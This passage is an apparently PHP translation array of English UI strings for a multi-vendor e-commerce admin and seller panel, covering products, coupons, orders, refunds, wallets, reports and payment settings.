'Add_new_product' => 'Add new product', 'product_type' => 'Product type', 'physical' => 'Physical', 'digital' => 'Digital', 'digital_product_type' => 'Digital product type', 'Ready After Sell' => 'Ready After Sell', 'Ready Product' => 'Ready Product', 'ready_product_upload' => 'Ready product upload', 'Product_reviews' => 'Product reviews', 'select_product' => 'Select product', 'select_customer' => 'Select customer', 'customer_removed' => 'Customer removed', 'Chatting_List' => 'Chatting List', 'Search_customers...' => 'Search customers...', 'Send_Reply' => 'Send Reply', 'bulk_Import' => 'Bulk Import', 'You can upload your product images in product folder from gallery and copy image`s path' => 'You can upload your product images in product folder from gallery and copy image`s path', 'Bank Information' => 'Bank Information', 'Holder_Name' => 'Holder Name', 'Bank_Name' => 'Bank Name', 'Branch_Name' => 'Branch Name', 'Account_Number' => 'Account Number', 'Edit_Bank_info' => 'Edit Bank info', 'Edit_Bank_Info' => 'Edit Bank Info', 'Shop_Info' => 'Shop Info', 'add_new_deliveryman' => 'Add new deliveryman', 'Ex : 017********' => 'Ex : 017********', 'Ex : ex@example.com' => 'Ex : ex@example.com', 'Ex : password' => 'Ex : password', 'Profile_Image' => 'Profile Image', 'Upload_image' => 'Upload image', 'choose_file' => 'Choose file', 'Duration' => 'Duration', 'End Date' => 'End Date', 'expired' => 'Expired', 'active_products' => 'Active products', 'publish' => 'Publish', 'Start Date' => 'Start Date', 'Terms_&_Conditions' => 'Terms & Conditions', 'Privacy_Policy' => 'Privacy Policy', 'About_Us' => 'About Us', 'withdraw' => 'Withdraw', 'action_disabled' => 'Action disabled', 'Order_Report' => 'Order Report', 'Total orders of' => 'Total orders of', 'product_stock' => 'Product stock', 'Sort' => 'Sort', 'wishlist_sort_by_(low_to_high)' => 'Wishlist sort by (low to high)', 'wishlist_sort_by_(high_to_low)' => 'Wishlist sort by (high to low)', 'Export' => 'Export', 'excel' => 'Excel', 'product_in_wishlist' => 'Product in wishlist', 'coupon_setup' => 'Coupon setup', 'Select Coupon Type' => 'Select Coupon Type', 'coupon_title' => 'Coupon title', 'generate_code' => 'Generate code', 'percentage (%)' => 'Percentage (%)', 'Discount_Amount' => 'Discount Amount', 'Ex: 500' => 'Ex: 500', 'minimum_purchase ($)' => 'Minimum purchase ($)', 'Ex: 100' => 'Ex: 100', 'maximum_discount ($)' => 'Maximum discount ($)', 'Ex: 5000' => 'Ex: 5000', 'coupon_list' => 'Coupon list', 'user_limit' => 'User limit', 'Limit' => 'Limit', 'Used' => 'Used', 'delivery_restriction' => 'Delivery restriction', 'general' => 'General', 'In-House_Shop' => 'In-House Shop', 'Refund' => 'Refund', 'Shipping_Method' => 'Shipping Method', 'delivery_to_country' => 'Delivery to country', 'country_name' => 'Country name', 'delivery_to_zip_code_area' => 'Delivery to zip code area', 'zip' => 'Zip', 'enter_zip_code' => 'Enter zip code', 'Failed_to_Deliver' => 'Failed to Deliver', 'sign_up' => 'Sign up', 'Search here ...' => 'Search here ...', 'Expand Menu' => 'Expand Menu', 'chat_with_delivery-man' => 'Chat with delivery-man', 'tax_fee' => 'Tax fee', 'Write your message here...' => 'Write your message here...', 'sign_in_with_google' => 'Sign in with google', 'sign_in_with_facebook' => 'Sign in with facebook', 'Online Shopping' => 'Online Shopping', 'Payment Status' => 'Payment Status', 'Item Details' => 'Item Details', 'Qty' => 'Qty', 'Order_&_Shipping_Info ' => 'Order & Shipping Info ', 'Order Status' => 'Order Status', 'Payment_Status' => 'Payment Status', 'deliveryman_will_get' => 'Deliveryman will get', 'expected_delivery_date' => 'Expected delivery date', 'Customer_information' => 'Customer information', 'Shop_Information' => 'Shop Information', 'Orders Served' => 'Orders Served', 'Account has been deleted you can not change the status!' => 'Account has been deleted you can not change the status!', 'Chat' => 'Chat', 'emergency_contact' => 'Emergency contact', 'Emergency_Contact' => 'Emergency Contact', 'Order_Details' => 'Order Details', 'Reference' => 'Reference', 'Item_Details' => 'Item Details', 'uploaded_file' => 'Uploaded file', 'failed_to_deliver' => 'Failed to deliver', 'Delivery_man' => 'Delivery man', 'Failed To Deliver' => 'Failed To Deliver', 'Refund_Request_List' => 'Refund Request List', 'Help_&_Support_Section' => 'Help & Support Section', 'Delivery-Man' => 'Delivery-Man', 'My_Bank_Info' => 'My Bank Info', 'My_Shop' => 'My Shop', 'Support Ticket Answer' => 'Support Ticket Answer', 'Order No' => 'Order No', 'Coupon Discount' => 'Coupon Discount', 'My Order' => 'My Order', 'Estimated Delivary Date' => 'Estimated Delivary Date', 'First step' => 'First step', 'Order placed' => 'Order placed', 'Second step' => 'Second step', 'Packaging order' => 'Packaging order', 'Third step' => 'Third step', 'Preparing Shipment' => 'Preparing Shipment', 'Fourth step' => 'Fourth step', 'Order Shipped' => 'Order Shipped', 'View Order Details' => 'View Order Details', 'Image ratio should be 1:1' => 'Image ratio should be 1:1', 'want_to_delete_this_account ' => 'Want to delete this account ', 'delete_account' => 'Delete account', 'My Loyalty Point' => 'My Loyalty Point', 'loyalty_point_history' => 'Loyalty point history', 'total_loyalty_point' => 'Total loyalty point', 'convert_to_currency' => 'Convert to currency', 'your loyalty point will convert to currency and transfer to your wallet' => 'Your loyalty point will convert to currency and transfer to your wallet', 'minimum point for convert to currency is :' => 'Minimum point for convert to currency is :', 'point' => 'Point', 'edit_address' => 'Edit address', 'Addresses' => 'Addresses', 'i_agree_to_Your' => 'I agree to Your', 'sign_up_with_google' => 'Sign up with google', 'sign_up_with_facebook' => 'Sign up with facebook', 'Earning_Reports' => 'Earning Reports', 'Admin_Earning' => 'Admin Earning', 'Seller_Earning' => 'Seller Earning', 'Total Sales' => 'Total Sales', 'Search by sores' => 'Search by sores', 'Seller Info' => 'Seller Info', 'Earn From Order' => 'Earn From Order', 'Earn From Shipping' => 'Earn From Shipping', 'Discount Given' => 'Discount Given', 'Tax Given' => 'Tax Given', 'Total Earning' => 'Total Earning', 'Withdrawable Balance' => 'Withdrawable Balance', 'Do_you_want_to_logout' => 'Do you want to logout', 'reports' => 'Reports', 'Transaction_Report' => 'Transaction Report', 'Environment_Setup' => 'Environment Setup', 'Generate_Site_Map' => 'Generate Site Map', 'Analytic_Script' => 'Analytic Script', 'Currency_Setup' => 'Currency Setup', 'Languages' => 'Languages', 'Clean_Database' => 'Clean Database', 'Environment_Information' => 'Environment Information', 'status_updated_successfully' => 'Status updated successfully', 'Select Logout below if you are ready to end your current session' => 'Select Logout below if you are ready to end your current session', 'We are sorry the page you requested could not be found' => 'We are sorry the page you requested could not be found', 'Sorry stock limit exceeded' => 'Sorry stock limit exceeded', 'In-house' => 'In-house', 'EX of SMS provider s template : your OTP is XXXX here please check' => 'EX of SMS provider s template : your OTP is XXXX here please check', 'Yes delete it' => 'Yes delete it', 'auto_translate' => 'Auto translate', 'refund_policy' => 'Refund policy', 'return_policy' => 'Return policy', 'cancellation_policy' => 'Cancellation policy', 'Sorry the minimum order quantity does not match' => 'Sorry the minimum order quantity does not match', 'Total Stores' => 'Total Stores', 'Total Products' => 'Total Products', 'Total Customers' => 'Total Customers', 'Most_Popular_Stores' => 'Most Popular Stores', 'Top_Delivery_Man' => 'Top Delivery Man', 'Key translated successfully' => 'Key translated successfully', 'translate' => 'Translate', 'general_settings' => 'General settings', 'App_Settings' => 'App Settings', 'refund' => 'Refund', 'By_turning_on_maintaince_mode _all_your_app_and_customer_side_website_will_be_off._Only_admin_panel_and_seller_panel_will_be_functional' => 'By turning on maintaince mode all your app and customer side website will be off. Only admin panel and seller panel will be functional', 'Company_Information' => 'Company Information', 'company_address' => 'Company address', 'business_Information' => 'Business Information', 'Position' => 'Position', 'Company_Copyright_Text' => 'Company Copyright Text', 'Website Color' => 'Website Color', 'Primary_Color' => 'Primary Color', 'Secondary Color' => 'Secondary Color', 'Website Header Logo' => 'Website Header Logo', 'Website_Footer_Logo' => 'Website Footer Logo', 'Website Favicon' => 'Website Favicon', 'Loading Gif' => 'Loading Gif', 'App_Logo' => 'App Logo', 'Cancel_Order' => 'Cancel Order', 'Place_Order' => 'Place Order', 'Sorry product is out of stock.' => 'Sorry product is out of stock.', 'Earning_Report' => 'Earning Report', 'sort_by_(low_to_high)' => 'Sort by (low to high)', 'sort_by_(high_to_low)' => 'Sort by (high to low)', 'customer added successfully' => 'Customer added successfully', 'No Account' => 'No Account', 'Already_Withdrawn' => 'Already Withdrawn', 'Add_New' => 'Add New', 'You have new order Check Please' => 'You have new order Check Please', 'Ok let me check' => 'Ok let me check', 'Search Data' => 'Search Data', 'This Year' => 'This Year', 'This Month' => 'This Month', 'Custom Date' => 'Custom Date', 'Total Earnings' => 'Total Earnings', 'Total In-House Products' => 'Total In-House Products', 'Earning Statistics' => 'Earning Statistics', 'Payment Statistics' => 'Payment Statistics', 'Payments Amount' => 'Payments Amount', 'Cash Payments' => 'Cash Payments', 'Digital Payments' => 'Digital Payments', 'Wallet Payments' => 'Wallet Payments', 'In-House Earning' => 'In-House Earning', 'Commission Earning' => 'Commission Earning', 'VAT/TAX' => 'VAT/TAX', 'Refund Given' => 'Refund Given', 'Cash Payments ' => 'Cash Payments ', 'search_menu' => 'Search menu', ' Ecommerce' => ' Ecommerce', 'wishlist' => 'Wishlist', 'wallet_payment' => 'Wallet payment', 'your_current_balance' => 'Your current balance', 'remaining_balance' => 'Remaining balance', 'you do not have sufficient balance for pay this order!!' => 'You do not have sufficient balance for pay this order!!', 'If you need help or you have any other questions feel free to email us' => 'If you need help or you have any other questions feel free to email us', 'In_House' => 'In House', 'Start_Date' => 'Start Date', 'End_Date' => 'End Date', 'Search by Order ID' => 'Search by Order ID', 'Order_&_Shipping_Info' => 'Order & Shipping Info', 'order wise' => 'Order wise', 'order wise seller shipping' => 'Order wise seller shipping', 'Yes Change it' => 'Yes Change it', 'Account has been deleted you can not change the status!' => 'Account has been deleted you can not change the status!', 'Order is already delivered You can not change it' => 'Order is already delivered You can not change it', 'order wise shipping' => 'Order wise shipping', 'product wise' => 'Product wise', 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation' => 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation', 'Fill_all_required_fields_of_billing_address' => 'Fill all required fields of billing address', 'Download' => 'Download', 'Product_not_uploaded_yet' => 'Product not uploaded yet', 'File' => 'File', 'File type: jpg jpeg png gif zip pdf' => 'File type: jpg jpeg png gif zip pdf', 'Product Report' => 'Product Report', 'product_report' => 'Product report', 'All_Products' => 'All Products', 'Out_of_Stock_Products' => 'Out of Stock Products', 'Wish_Listed_Products' => 'Wish Listed Products', 'Product Unit Price' => 'Product Unit Price', 'Total Amount Sold' => 'Total Amount Sold', 'Total Discount Given' => 'Total Discount Given', 'Average Product Value' => 'Average Product Value', 'Current Stock Amount' => 'Current Stock Amount', 'Average Ratings' => 'Average Ratings', 'Last Updated Stock' => 'Last Updated Stock', 'In-House_Product_List' => 'In-House Product List', 'Limited Sotcks' => 'Limited Sotcks', 'Add_New_Product' => 'Add New Product', 'Show_as_featured' => 'Show as featured', 'Discount_Type' => 'Discount Type', 'optional please provide embed link not direct link' => 'Optional please provide embed link not direct link', 'Want to add this product' => 'Want to add this product', 'seller_list' => 'Seller list', 'contact_info' => 'Contact info', 'total_products' => 'Total products', 'total_orders' => 'Total orders', 'In-Active' => 'In-Active', 'No Data found' => 'No Data found', 'Total Seller' => 'Total Seller', 'Total Seller Products' => 'Total Seller Products', 'Rejected' => 'Rejected', 'Pending Request' => 'Pending Request', 'Active Product' => 'Active Product', 'Seller Wallet Status' => 'Seller Wallet Status', 'Wallet Amount' => 'Wallet Amount', 'Withdrawble Balance' => 'Withdrawble Balance', 'Pending Withdraws' => 'Pending Withdraws', 'Already Withdrawn' => 'Already Withdrawn', 'cash on delivery' => 'Cash on delivery', 'admin_bearer' => 'Admin bearer', 'Failed_to_deliver' => 'Failed to deliver', 'Yes Change it!' => 'Yes Change it!', 'Order is already delivered You can not change it !!' => 'Order is already delivered You can not change it !!', 'Select_coupon_type' => 'Select coupon type', 'Free_Delivery' => 'Free Delivery', 'First_Order' => 'First Order', 'coupon_bearer' => 'Coupon bearer', 'Select_coupon_bearer' => 'Select coupon bearer', 'admin' => 'Admin', 'select_seller' => 'Select seller', 'Select_customer' => 'Select customer', 'all_customer' => 'All customer', 'discount_bearer' => 'Discount bearer', 'discount on purchase' => 'Discount on purchase', 'free delivery' => 'Free delivery', 'first order' => 'First order', 'coupon_update' => 'Coupon update', 'all_seller' => 'All seller', 'coupon_bearer_is_required!' => 'Coupon bearer is required!', 'select_seller_is_required!' => 'Select seller is required!', 'select_customer_is_required!' => 'Select customer is required!', 'limit_for_same_user_is_required!' => 'Limit for same user is required!', 'discount_type_is_required!' => 'Discount type is required!', 'discount_amount_is_required!' => 'Discount amount is required!', 'minimum_purchase_is_required!' => 'Minimum purchase is required!', 'Admin_Earning_Report' => 'Admin Earning Report', 'In-House_earning' => 'In-House earning', 'shipping_earn' => 'Shipping earn', 'discount_given' => 'Discount given', 'refund_given' => 'Refund given', 'All_copy_right_reserved_©_2023_' => 'All copy right reserved © 2023 ', 'Search_Data' => 'Search Data', 'This_Week' => 'This Week', 'Custom_Date' => 'Custom Date', 'Tax Collected' => 'Tax Collected', 'Seller_Info' => 'Seller Info', 'Earn_From_Order' => 'Earn From Order', 'Earn_From_Shipping' => 'Earn From Shipping', 'Commission_Given' => 'Commission Given', 'Discount_Given' => 'Discount Given', 'Tax_Collected' => 'Tax Collected', 'Refund_Given' => 'Refund Given', 'Total_Earning' => 'Total Earning', 'Total_Seller' => 'Total Seller', 'Total_Seller_Products' => 'Total Seller Products', 'Earning_Statistics' => 'Earning Statistics', 'Average_Earning_Value' => 'Average Earning Value', 'inhouse_sale' => 'Inhouse sale', 'Are you sure delete this ' => 'Are you sure delete this ', 'delete it' => 'Delete it', 'identity_image' => 'Identity image', 'password_minimum_8_characters' => 'Password minimum 8 characters', 'Contact_Info' => 'Contact Info', 'Total_Orders' => 'Total Orders', 'Seller Reports' => 'Seller Reports', 'Completion Rate' => 'Completion Rate', 'Refund Rate' => 'Refund Rate', 'transaction_report' => 'Transaction report', 'Expense_Transactions' => 'Expense Transactions', 'Select Seller' => 'Select Seller', 'Select Customer' => 'Select Customer', 'Select Time Period' => 'Select Time Period', 'Total Orders' => 'Total Orders', 'In-House Orders' => 'In-House Orders', 'Seller Orders' => 'Seller Orders', 'Order Statistics' => 'Order Statistics', 'Total Transactions' => 'Total Transactions', 'Download PDF' => 'Download PDF', 'total_product_amount' => 'Total product amount', 'product_discount' => 'Product discount', 'discounted_amount' => 'Discounted amount', 'admin_discount' => 'Admin discount', 'seller_discount' => 'Seller discount', 'admin_net_income' => 'Admin net income', 'seller_net_income' => 'Seller net income', 'test' => 'Test', 'Oder_Transaction_Statement' => 'Oder Transaction Statement', 'Customer_Info' => 'Customer Info', 'Payment_Method' => 'Payment Method', 'latest' => 'Latest', 'featured deal' => 'Featured deal', 'Delivered_By' => 'Delivered By', 'delivery_man' => 'Delivery man', 'additional' => 'Additional', 'Total_Order' => 'Total Order', 'In-House_Order' => 'In-House Order', 'Seller_Order' => 'Seller Order', 'Total_In-House_Products' => 'Total In-House Products', 'Total_Stores' => 'Total Stores', 'total_ordered_product_price' => 'Total ordered product price', 'total_product_discount' => 'Total product discount', 'total_coupon_discount' => 'Total coupon discount', 'total_discounted_amount' => 'Total discounted amount', 'total_delivery_charge' => 'Total delivery charge', 'total_order_amount' => 'Total order amount', 'total_order' => 'Total order', 'cash_payment' => 'Cash payment', 'In-House Products' => 'In-House Products', 'Seller Products' => 'Seller Products', 'completed_payments' => 'Completed payments', 'cash_payments' => 'Cash payments', 'digital_payments' => 'Digital payments', 'completed' => 'Completed', 'payments' => 'Payments', 'Total Expense' => 'Total Expense', 'Free Delivery' => 'Free Delivery', 'In-House Product Discount' => 'In-House Product Discount', 'Transaction Statistics' => 'Transaction Statistics', 'Search by ID...' => 'Search by ID...', 'XID' => 'XID', 'Transaction Date' => 'Transaction Date', 'Expense Amount' => 'Expense Amount', 'Expense Type' => 'Expense Type', 'refund_transactions' => 'Refund transactions', 'this_year' => 'This year', 'this_month' => 'This month', 'this_week' => 'This week', 'custom_date' => 'Custom date', 'search_data' => 'Search data', 'transaction_date' => 'Transaction date', 'expense_type' => 'Expense type', 'expense_amount' => 'Expense amount', 'total_expense' => 'Total expense', 'total_expense_transactions' => 'Total expense transactions', 'category wise' => 'Category wise', 'test 1' => 'Test 1', 'total_expense_amount' => 'Total expense amount', 'free_delivery_amount' => 'Free delivery amount', 'coupon_discount_amount' => 'Coupon discount amount', 'free_delivery_on_coupon_discount' => 'Free delivery on coupon discount', 'Total_Expense' => 'Total Expense', 'Free_Delivery_on_Coupon_Discount' => 'Free Delivery on Coupon Discount', 'Coupon_Discount' => 'Coupon Discount', 'customer wallet' => 'Customer wallet', 'digitally paid' => 'Digitally paid', 'Free_Delivery_Coupon' => 'Free Delivery Coupon', 'paypal' => 'Paypal', 'Total Amount' => 'Total Amount', 'Product Discount' => 'Product Discount', 'Shipping Charge' => 'Shipping Charge', 'filter_data' => 'Filter data', 'reund_requests' => 'Reund requests', 'Pending_Refund_Requests' => 'Pending Refund Requests', 'product_info' => 'Product info', 'total_amount' => 'Total amount', 'it is already refunded you can not change it!!' => 'It is already refunded you can not change it!!', 'filter Data' => 'Filter Data', 'Filter_Data' => 'Filter Data', 'Total_Earnings' => 'Total Earnings', 'all_sellers' => 'All sellers', 'active_sellers' => 'Active sellers', 'online_seller' => 'Online seller', 'offline_seller' => 'Offline seller', 'banned_seller' => 'Banned seller', 'Delivery_Restriction' => 'Delivery Restriction', 'delivery_available_country' => 'Delivery available country', 'delivery_available_zip_code_area' => 'Delivery available zip code area', 'multiple_zip_codes_can_be_inputted_by_comma_separating_or_pressing_enter_button' => 'Multiple zip codes can be inputted by comma separating or pressing enter button', 'customer_settings' => 'Customer settings', 'customer_wallet_settings' => 'Customer wallet settings', 'refund_to_wallet' => 'Refund to wallet', 'refund_to_wallet_hint' => 'Refund to wallet hint', 'show_hide_food_menu' => 'Show hide food menu', 'loyalty_point' => 'Loyalty point', 'how_much_point' => 'How much point', 'percentage_of_loyalty_point_on_order_amount' => 'Percentage of loyalty point on order amount', 'minimum_point_to_transfer' => 'Minimum point to transfer', 'Customer_list' => 'Customer list', 'want_to_change_status' => 'Want to change status', 'SMS_Config' => 'SMS Config', 'Mail_Config' => 'Mail Config', 'Payment_Methods' => 'Payment Methods', 'Recaptcha' => 'Recaptcha', 'Google_Map_APIs' => 'Google Map APIs', 'Push_Notification_Setup' => 'Push Notification Setup', 'Social_Media_Login' => 'Social Media Login', 'NB_:_#OTP#_will_be_replace_with_otp' => 'NB : #OTP# will be replace with otp', 'Google_Recapcha_Information' => 'Google Recapcha Information', 'Credentials_SetUp_page' => 'Credentials SetUp page', 'To get site key and secret keyGo to the Credentials page' => 'To get site key and secret keyGo to the Credentials page', 'Click_here' => 'Click here', 'Add_a _abel_(Ex:_abc_company)' => 'Add a abel (Ex: abc company)', 'Select_reCAPTCHA_v2_as_ReCAPTCHA_Type' => 'Select reCAPTCHA v2 as ReCAPTCHA Type', 'select_sub_type' => 'Select sub type', 'im_not_a_robot_checkbox ' => 'Im not a robot checkbox ', 'Add_Domain_(For_ex:_demo.6amtech.com)' => 'Add Domain (For ex: demo.6amtech.com)', 'Check_in_“Accept_the_reCAPTCHA_Terms_of_Service”' => 'Check in “Accept the reCAPTCHA Terms of Service”', 'Press_Submit' => 'Press Submit', 'Copy_Site_Key_and_Secret_Key _Paste_in_the_input_filed_below_and_Save.' => 'Copy Site Key and Secret Key Paste in the input filed below and Save.', 'ongoing' => 'Ongoing', 'Total_Deliveryman' => 'Total Deliveryman', 'Total_Store_Earnings' => 'Total Store Earnings', 'Product has been added to wishlist' => 'Product has been added to wishlist', 'app_settings' => 'App settings', 'Total_Sales' => 'Total Sales', 'Product_Name' => 'Product Name', 'Product_Unit_Price' => 'Product Unit Price', 'Total_Amount_Sold' => 'Total Amount Sold', 'Total_Discount_Given' => 'Total Discount Given', 'Average_Product_Value' => 'Average Product Value', 'Current_Stock_Amount' => 'Current Stock Amount', 'Average_Ratings' => 'Average Ratings', 'total_product' => 'Total product', 'Sales_Statistics' => 'Sales Statistics', 'Average_Sales_Value' => 'Average Sales Value', 'Total_Product_Sale' => 'Total Product Sale', 'Total_Product' => 'Total Product', 'Seller_Product_List' => 'Seller Product List', 'Top_5_Product_Wise_Sale' => 'Top 5 Product Wise Sale', 'All_Priority' => 'All Priority', 'All_Status' => 'All Status', 'Open' => 'Open', 'low' => 'Low', 'Website Problem' => 'Website Problem', 'Info inquiry' => 'Info inquiry', 'Sub' => 'Sub', 'Select_main_category' => 'Select main category', 'sub_sub_category_list' => 'Sub sub category list', 'select_category' => 'Select category', 'Total_Sale' => 'Total Sale', 'Search_by_Name' => 'Search by Name', 'Brand_Logo' => 'Brand Logo', 'Download the format file and fill it with proper data.' => 'Download the format file and fill it with proper data.', 'You can download the example file to understand how the data must be filled.' => 'You can download the example file to understand how the data must be filled.', 'Once you have downloaded and filled the format file' => 'Once you have downloaded and filled the format file', 'upload it in the form below and submit.' => 'Upload it in the form below and submit.', 'After uploading products you need to edit them and set product images and choices.' => 'After uploading products you need to edit them and set product images and choices.', 'You can get brand and category id from their list' => 'You can get brand and category id from their list', 'please input the right ids.' => 'Please input the right ids.', 'You can upload your product images in product folder from gallery' => 'You can upload your product images in product folder from gallery', 'and copy image`s path.' => 'And copy image`s path.', 'Don`t_have_the_template_ ' => 'Don`t have the template ', 'download_here' => 'Download here', 'Deal Of The Day' => 'Deal Of The Day', 'Select Product' => 'Select Product', 'Limited_Stocked_Products_List' => 'Limited Stocked Products List', 'Purchese price' => 'Purchese price', 'Current_Stock' => 'Current Stock', 'In-Stock' => 'In-Stock', 'Out_of_Stock' => 'Out of Stock', 'search_by_order_id' => 'Search by order id', 'Filter_Report' => 'Filter Report', 'No_data_to_found' => 'No data to found', '' => '', 'Due_Amount' => 'Due Amount', 'Already_Settled' => 'Already Settled', 'Total_Order_Amount' => 'Total Order Amount', 'Order_Statistics' => 'Order Statistics', 'Payment_Statistics' => 'Payment Statistics', 'Cash_Payments' => 'Cash Payments', 'Digital_Payments' => 'Digital Payments', 'Products_Stock' => 'Products Stock', 'Product_Stock' => 'Product Stock', 'Active_Products' => 'Active Products', 'Inactive_Products' => 'Inactive Products', 'Pending_Products' => 'Pending Products', 'available' => 'Available', 'Attribute_Setup' => 'Attribute Setup', 'Attribute_Name' => 'Attribute Name', 'not_available' => 'Not available', 'Completed_Orders' => 'Completed Orders', 'Ongoing_Orders' => 'Ongoing Orders', 'Canceled_Orders' => 'Canceled Orders', 'order_ID' => 'Order ID', 'Expense_Transaction_Statement' => 'Expense Transaction Statement', 'stock_sort_by_(low_to_high)' => 'Stock sort by (low to high)', 'stock_sort_by_(high_to_low)' => 'Stock sort by (high to low)', 'software_update' => 'Software update', 'admin wallets' => 'Admin wallets', 'admin wallet histori...' => 'Admin wallet histori...', 'attributes' => 'Attributes', 'billing addresses' => 'Billing addresses', 'carts' => 'Carts', 'cart shippings' => 'Cart shippings', 'category shipping co...' => 'Category shipping co...', 'chattings' => 'Chattings', 'contacts' => 'Contacts', 'customer wallets' => 'Customer wallets', 'customer wallet hist...' => 'Customer wallet hist...', 'deal of the days' => 'Deal of the days', 'deliveryman notifica...' => 'Deliveryman notifica...', 'deliveryman wallets' => 'Deliveryman wallets', 'delivery country cod...' => 'Delivery country cod...', 'delivery histories' => 'Delivery histories', 'delivery man transac...' => 'Delivery man transac...', 'delivery men' => 'Delivery men', 'delivery zip codes' => 'Delivery zip codes', 'emergency contacts' => 'Emergency contacts', 'feature deals' => 'Feature deals', 'flash deal products' => 'Flash deal products', 'help topics' => 'Help topics', 'jobs' => 'Jobs', 'loyalty point transa...' => 'Loyalty point transa...', 'notifications' => 'Notifications', 'order details' => 'Order details', 'order expected deliv...' => 'Order expected deliv...', 'order status histori...' => 'Order status histori...', 'order transactions' => 'Order transactions', 'paytabs invoices' => 'Paytabs invoices', 'product stocks' => 'Product stocks', 'refund requests' => 'Refund requests', 'refund statuses' => 'Refund statuses', 'refund transactions' => 'Refund transactions', 'search functions' => 'Search functions', 'seller wallets' => 'Seller wallets', 'seller wallet histor...' => 'Seller wallet histor...', 'shipping addresses' => 'Shipping addresses', 'shipping methods' => 'Shipping methods', 'shipping types' => 'Shipping types', 'shops' => 'Shops', 'subscriptions' => 'Subscriptions', 'support tickets' => 'Support tickets', 'support ticket convs' => 'Support ticket convs', 'transactions' => 'Transactions', 'translations' => 'Translations', 'wallet transactions' => 'Wallet transactions', 'wishlists' => 'Wishlists', 'withdraw requests' => 'Withdraw requests', 'updated_files' => 'Updated files', 'updated_file' => 'Updated file', 'upload_the_updated_file' => 'Upload the updated file', 'We are sorry, the page you requested could not be found' => 'We are sorry the page you requested could not be found', 'activate_maintenance_mode' => 'Activate maintenance mode', 'maintenance_mode_activated_for_others_you_can_update_now' => 'Maintenance mode activated for others you can update now', 'codecanyon_username' => 'Codecanyon username', 'purchase_code' => 'Purchase code', 'Brand_Name' => 'Brand Name', 'choose_updated_file' => 'Choose updated file', 'upload_&_update' => 'Upload & update', 'Tax_Model' => 'Tax Model', 'include' => 'Include', 'exclude' => 'Exclude', 'tags' => 'Tags', 'search_tags' => 'Search tags', 'discounted' => 'Discounted', 'all_status' => 'All status', 'shipping_charge' => 'Shipping charge', 'seller_information' => 'Seller information', 'Seller_Image' => 'Seller Image', 'Ex: 8+ Character' => 'Ex: 8+ Character', 'shop_information' => 'Shop information', 'Withdrawal_Method' => 'Withdrawal Method', 'Withdrawal_Methods' => 'Withdrawal Methods', 'withdraw_method_list' => 'Withdraw method list', 'Withdrawal_method_List' => 'Withdrawal method List', 'Add_method' => 'Add method', 'Add_fields' => 'Add fields', 'method_name' => 'Method name', 'Input Field Type' => 'Input Field Type', 'String' => 'String', 'field_name' => 'Field name', 'placeholder_text' => 'Placeholder text', 'This_field_required' => 'This field required', 'default_method' => 'Default method', 'Reset' => 'Reset', 'Reached maximum' => 'Reached maximum', 'ok' => 'Ok', 'Add_Fields' => 'Add Fields', 'methods' => 'Methods', 'account_name' => 'Account name', 'Placeholder' => 'Placeholder', 'Is Required' => 'Is Required', 'branch_name' => 'Branch name', 'want_to_update_status' => 'Want to update status', 'want_to_make_default_method' => 'Want to make default method', 'card_number' => 'Card number', 'card_type' => 'Card type', 'want_to_delete_this_method' => 'Want to delete this method', 'Default_Method_updated_successfully' => 'Default Method updated successfully', 'Default_Method_updated_failed.' => 'Default Method updated failed.', 'Method_name' => 'Method name', 'method_fields' => 'Method fields', 'active_status' => 'Active status', 'status_updated_failed.' => 'Status updated failed.', 'rtgr' => 'Rtgr', 'Once deleted you will not be able to recover this' => 'Once deleted you will not be able to recover this', 'Withdraw_Request' => 'Withdraw Request', 'Select_Withdraw_Method' => 'Select Withdraw Method', 'Total_Shop' => 'Total Shop', 'Cash_ Payments' => 'Cash Payments', 'Wallet_Payments' => 'Wallet Payments', 'shop_info' => 'Shop info', 'Edit_Shop_Info' => 'Edit Shop Info', 'By_turning_on_temporary_close_mode _your_shop_will_be_shown_as_temporary_off_in_the_website_and_app_for_the_customers._they_cannot_purchase_or_place_order_from_your_shop' => 'By turning on temporary close mode your shop will be shown as temporary off in the website and app for the customers. they cannot purchase or place order from your shop', 'mtemporary_close' => 'Mtemporary close', 'temporary_close' => 'Temporary close', 'Vacation_Start' => 'Vacation Start', 'Vacation_End' => 'Vacation End', 'Vacation_Mode' => 'Vacation Mode', 'set_vacation_mode_for_shop_means_you_will_be_not_available_receive_order_and_provider_products_for_placed_order_at_that_time' => 'Set vacation mode for shop means you will be not available receive order and provider products for placed order at that time', 'Vacation_Note' => 'Vacation Note', 'pay by wallet' => 'Pay by wallet', 'temporary_close_inactive_successfully' => 'Temporary close inactive successfully', 'closed_for_now' => 'Closed for now', 'temporary_closed' => 'Temporary closed', 'this_shop_is_temporary_closed._You_cannot_add_product_to_cart_from_this_shop_for_now' => 'This shop is temporary closed. You cannot add product to cart from this shop for now', 'PAYMENT_METHOD' => 'PAYMENT METHOD', 'published_key' => 'Published key', 'offline_payment' => 'Offline payment', 'Configure' => 'Configure', 'successfully_updated' => 'Successfully updated', 'Store_Client_ID' => 'Store Client ID', 'Store_Client_Secret_Key' => 'Store Client Secret Key', 'See_Credential_Setup_Instructions' => 'See Credential Setup Instructions', 'Now copy' => 'Now copy', 'payment_by' => 'Payment by', 'payment_note' => 'Payment note', 'transaction_ID' => 'Transaction ID', 'offline payment' => 'Offline payment', 'Payment_Note' => 'Payment Note', 'Payment_Details' => 'Payment Details', 'Shop_Name' => 'Shop Name', 'Shipping_Address' => 'Shipping Address', 'Billing_Address' => 'Billing Address', 'Contact_Number' => 'Contact Number', 'Order_Invoice' => 'Order Invoice', 'Total_Ordered_Product_Price' => 'Total Ordered Product Price', 'Total_Product_Discount' => 'Total Product Discount', 'Total_Coupon_Discount' => 'Total Coupon Discount', 'Total_Discounted_Amount' => 'Total Discounted Amount', 'Total_Delivery_Charge' => 'Total Delivery Charge', 'totals' => 'Totals', 'Admin_Discount' => 'Admin Discount', 'Seller_Discount' => 'Seller Discount', 'Admin_Commission' => 'Admin Commission', 'Admin_Net_Income' => 'Admin Net Income', 'Seller_Net_Income' => 'Seller Net Income', 'Social_Media_Chatting' => 'Social Media Chatting', 'Social-Media-Chatting' => 'Social-Media-Chatting', 'Social_Media_Chat' => 'Social Media Chat', 'messenger' => 'Messenger', 'paste_script' => 'Paste script', 'WhatsApp' => 'WhatsApp', 'whatsapp_phone_number' => 'Whatsapp phone number', 'Refund_Policy' => 'Refund Policy', 'Return_Policy' => 'Return Policy', 'Cancellation_Policy' => 'Cancellation Policy', 'return-policy' => 'Return-policy', 'refund-policy' => 